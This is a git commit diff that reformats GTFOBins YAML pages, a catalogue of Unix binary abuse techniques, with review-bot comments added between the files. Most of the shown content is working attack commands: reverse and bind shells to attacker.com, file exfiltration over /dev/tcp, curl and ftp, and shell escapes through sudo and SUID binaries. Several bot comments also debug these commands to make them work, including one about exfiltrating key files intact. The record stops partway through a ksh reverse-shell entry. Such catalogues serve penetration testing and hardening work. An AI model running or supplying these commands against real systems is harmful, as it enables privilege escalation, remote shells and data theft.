Fix YAMLs according to YAMLlint
This commit is contained in:
parent
785126ede0
commit
e1cd3aed68
3
.yamllint
Normal file
3
.yamllint
Normal file
@ -0,0 +1,3 @@
|
||||
extends: default
|
||||
rules:
|
||||
line-length: disable
|
5
Makefile
5
Makefile
@ -1,4 +1,4 @@
|
||||
.PHONY: serve serve-public bundle
|
||||
.PHONY: serve serve-public bundle lint
|
||||
|
||||
serve:
|
||||
bundle exec jekyll serve
|
||||
@ -8,3 +8,6 @@ serve-public:
|
||||
|
||||
bundle:
|
||||
bundle install
|
||||
|
||||
lint:
|
||||
yamllint . _gtfobins/*.md
|
||||
|
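Review bot: The new `lint` target should say why `_gtfobins/*.md` is passed explicitly next to `.`, because yamllint's default discovery appears to pick up only `*.yaml`/`*.yml` files and would otherwise skip the Markdown-wrapped front matter the target exists to check. I would add `## Lint the YAML config files plus the front matter of every _gtfobins entry (yamllint does not discover *.md on its own)` above `lint:`. Since `lint` has no prerequisite on `bundle` and yamllint is not installed by `bundle install`, a one-line note that it must be installed separately would spare contributors a bare "command not found".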
@ -1,3 +1,4 @@
|
||||
---
|
||||
title: GTFOBins
|
||||
|
||||
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
|
||||
|
@ -1,3 +1,4 @@
|
||||
---
|
||||
execute-interactive:
|
||||
label: Interactive execute
|
||||
description: |
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ash
|
||||
- code: ash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./ash"
|
||||
- code: "./ash"
|
||||
sudo-enabled:
|
||||
- code: sudo ash
|
||||
- code: sudo ash
|
||||
---
|
||||
|
@ -1,34 +1,34 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
bind-shell-non-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
awk -v LPORT=$LPORT 'BEGIN {
|
||||
s = "/inet/tcp/" LPORT "/0/0";
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
awk -v LPORT=$LPORT 'BEGIN {
|
||||
s = "/inet/tcp/" LPORT "/0/0";
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
---
|
||||
|
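Review bot: The reverse-shell-non-interactive and bind-shell-non-interactive entries rely on the `/inet/tcp/...` special files and the `|&` coprocess operator, which are GNU awk extensions, yet their descriptions only mention the listener to run; on a box whose `awk` is mawk or BusyBox awk these one-liners fail with a syntax error. I would extend each description, e.g. `Run \`nc -l -p 12345\` on the attacker box to receive the shell. Requires GNU awk (gawk), since it uses the \`/inet/tcp\` special files and the \`|&\` coprocess operator.` The file-read and file-write entries use only portable awk and need no such caveat.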
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
---
|
||||
|
@ -1,55 +1,52 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: bash
|
||||
- code: bash
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
bash -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
bash -c 'echo "$(<$LFILE)"'
|
||||
suid-enabled:
|
||||
- code: "./bash -p"
|
||||
- code: "./bash -p"
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
- code: sudo bash
|
||||
---
|
||||
|
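Review bot: The HTTP POST upload entry reads the file through `$(<$LFILE)`, which has exactly the limitation the file-read entry documents ("It trims trailing newlines and it's not binary-safe"), but the upload description does not say so, and a reader exfiltrating a binary or key file will get a silently mangled copy. I would extend that description: `Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Like the file-read example this goes through \`$(<$LFILE)\`, so trailing newlines are trimmed and it is not binary-safe; use the TCP variant for binary data.` The TCP upload variant uses `cat` and is unaffected.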
@ -1,27 +1,25 @@
|
||||
---
|
||||
description: |
|
||||
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
|
||||
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
|
||||
what GTFBins binaries are supported. Here some example.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: busybox sh
|
||||
- code: busybox sh
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
suid-enabled:
|
||||
- description: It may drop the SUID privileges depending on the compilation flags
|
||||
and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
sudo-enabled:
|
||||
- code: sudo busybox sh
|
||||
- code: sudo busybox sh
|
||||
---
|
||||
|
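Review bot: The rewritten description carries two typos into the new plain scalar, `GTFBins` for `GTFOBins` and `Here some example.` for `Here are some examples.`, and since the scalar now continues on a second line that line must keep its indentation or the front matter stops parsing; a folded `description: >` block would make that explicit and survive a reflow. Separately, the file-read entry runs `./busybox cat "$LFILE"` with a relative path while every other non-SUID example in this entry calls `busybox ...`; this looks like a leftover from the suid-enabled form and should read `busybox cat "$LFILE"`.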
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: crontab -e
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: crontab -e
|
||||
sudo-enabled:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: sudo crontab -e
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: sudo crontab -e
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: csh
|
||||
- code: csh
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./csh -b"
|
||||
- code: "./csh -b"
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
- code: sudo csh
|
||||
---
|
||||
|
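Review bot: The file-write entry in what appears to be the csh page (execute-interactive is `csh`) runs `ash -c 'echo data > $LFILE'`, so it only works where ash happens to be installed and never exercises csh at all, which defeats the purpose of the entry. The command should be `csh -c 'echo data > $LFILE'`, which csh accepts with the `export`ed variable. The same copy-paste appears in the dash entry and should be fixed there too.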
@ -1,21 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on
|
||||
the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
curl $URL -o $LFILE
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
curl $URL -o $LFILE
|
||||
file-read:
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
---
|
||||
|
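Review bot: The upload entry sets `LFILE=file_to_send` but then passes `-d @$file_to_send`, an unset variable, so curl is told to read the body from an empty file name and the upload fails; the line should be `curl -X POST -d @$LFILE $URL`. Also worth a caveat in the description: `-d @file` strips carriage returns and newlines from the body, so for anything other than a single-line text file `--data-binary @$LFILE` is the option that preserves the content.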
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: dash
|
||||
- code: dash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./dash -p"
|
||||
- code: ./dash -p
|
||||
sudo-enabled:
|
||||
- code: sudo dash
|
||||
- code: sudo dash
|
||||
---
|
||||
|
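Review bot: The file-write entry in what appears to be the dash page (execute-interactive is `dash`) invokes `ash -c 'echo data > $LFILE'`, so it depends on ash being present and does not demonstrate dash; it should be `dash -c 'echo data > $LFILE'`. The csh entry has the same leftover.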
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
---
|
||||
|
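Review bot: The file-read entry runs `dd if=LFILE` without the `$`, so dd tries to open a file literally named `LFILE` and the example fails as written; it should be `dd if=$LFILE` (or `dd if="$LFILE"` to match the quoting used by the other file-read entries in this commit). The commit only reformats this file, so the bug predates it, but it is in the new content.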
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
---
|
||||
|
@ -1,23 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
file-write:
|
||||
- code: |
|
||||
ed file_to_write
|
||||
w
|
||||
- code: |
|
||||
ed file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: 'ed file_to_read
|
||||
|
||||
'
|
||||
- code: ed file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
---
|
||||
|
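Review bot: The file-read entry is now the single line `ed file_to_read`, which only loads the file into ed's buffer and prints its byte count; nothing is displayed without a print command such as `,p`, so the example does not actually read the file. Likewise the file-write entry issues only `w`, which rewrites the buffer ed has just read (or creates an empty file) and never inserts any data, unlike the other file-write entries that write `data`. I would make both self-contained as below.
```yaml
  file-write:
    - code: |
        ed file_to_write
        a
        DATA
        .
        w
        q
  file-read:
    - code: |
        ed file_to_read
        ,p
        q
# … unchanged: execute-interactive, sudo-enabled, suid-limited …
```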
@ -1,17 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
file-write:
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
C-x C-s
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: 'emacs file_to_read
|
||||
|
||||
'
|
||||
- code: emacs file_to_read
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: env /bin/sh
|
||||
- code: env /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./env /bin/sh -p"
|
||||
- code: ./env /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
- code: sudo env /bin/sh
|
||||
---
|
||||
|
@ -1,18 +1,16 @@
|
||||
---
|
||||
description: 'The read file content is corrupted by replacing tabs with spaces.
|
||||
|
||||
'
|
||||
description: The read file content is corrupted by replacing tabs with spaces.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: "./expect -c 'spawn /bin/sh -p;interact'"
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: "./find . -exec /bin/sh -p \\; -quit"
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: flock -u / /bin/sh
|
||||
- code: flock -u / /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./flock -u / /bin/sh -p"
|
||||
- code: ./flock -u / /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo flock -u / /bin/sh
|
||||
- code: sudo flock -u / /bin/sh
|
||||
---
|
||||
|
@ -1,18 +1,16 @@
|
||||
---
|
||||
description: 'The read file content is not binary-safe.
|
||||
|
||||
'
|
||||
description: The read file content is not binary-safe.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
---
|
||||
|
@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -7,11 +7,11 @@ description: |
|
||||
[version 3](/gtfobins/python3/).
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ionice /bin/sh
|
||||
- code: ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./ionice /bin/sh -p"
|
||||
- code: ./ionice /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
- code: sudo ionice /bin/sh
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
---
|
||||
|
@ -1,59 +1,56 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ksh
|
||||
- code: ksh
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
